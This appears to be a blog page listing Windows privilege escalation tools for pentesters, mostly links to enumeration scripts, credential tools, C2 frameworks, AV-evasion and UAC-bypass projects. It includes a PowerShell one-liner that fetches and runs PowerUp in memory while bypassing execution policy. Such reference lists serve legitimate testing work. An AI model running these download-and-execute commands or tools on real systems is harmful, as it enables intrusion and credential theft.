Windows Privilege Escalation Guide – part 1 | Tools
Tools : –
Here is a list of most comman tools that are used by various pentester to enumrate and exploit the windows vulnerabilites .
- https://github.com/fireeye/commando-vm
- https://github.com/fdiskyou/incognito2
- https://github.com/PowerShellMafia/PowerSploit
- https://github.com/gentilkiwi/mimikatz
- https://github.com/samratashok/nishang
- https://github.com/SecureAuthCorp/impacket
- https://www.powershellempire.com/
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
- https://github.com/AusJock/Privilege-Escalation/tree/master/Windows
- PowerSploit’s PowerUp
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’); Invoke-AllChecks
- Watson – Watson is a (.NET 2.0 compliant) C# implementation of Sherlock
- (Deprecated) Sherlock – PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities
- powershell.exe -ExecutionPolicy Bypass -NoLogo -Non-Interactive -NoProfile -File Sherlock.ps1
- BeRoot – Privilege Escalation Project – Windows / Linux / Mac
- Windows-Exploit-Suggester./windows-exploit-suggester.py –update ./windows-exploit-suggester.py –database 2014-06-06-mssb.xlsx –system info win7sp1-systeminfo.txt
- windows-privesc-check – Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
- WindowsExploits – Windows exploits, mostly precompiled. Not being updated.
- WindowsEnum – A Powershell Privilege Escalation Enumeration Script.
- Seatbelt – A C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.
- Powerless – Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind
- JAWS – Just Another Windows (Enum) Script
- http://pentestit.com/list-of-open-source-c2-post-exploitation-frameworks/
- powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
- https://github.com/nccgroup/redsnarf
- https://github.com/Dhayalanb/windows-php-reverse-shell
- https://github.com/govolution/avet
- https://www.shellterproject.com/
- https://github.com/paranoidninja/CarbonCopy
- https://github.com/Exploit-install/shellsploit-framework
- https://immunityinc.com/products/debugger/
- https://github.com/hausec/ADAPE-Script
- https://github.com/BloodHoundAD/BloodHound/wiki
- https://github.com/foxglovesec/Potato
- https://github.com/BorjaMerino/Pazuzu
- https://github.com/zerosum0x0/koadic
- https://github.com/enigma0x3/Powershell-C2
- https://cobbr.io/Covenant.html
- https://github.com/cobbr/Covenant/wiki
- https://github.com/its-a-feature/Apfell
- https://www.factionc2.com/
- https://github.com/klinix5/UAC_Bypass
- https://github.com/L3cr0f/DccwBypassUAC#4-metasploit-module
Recent Comments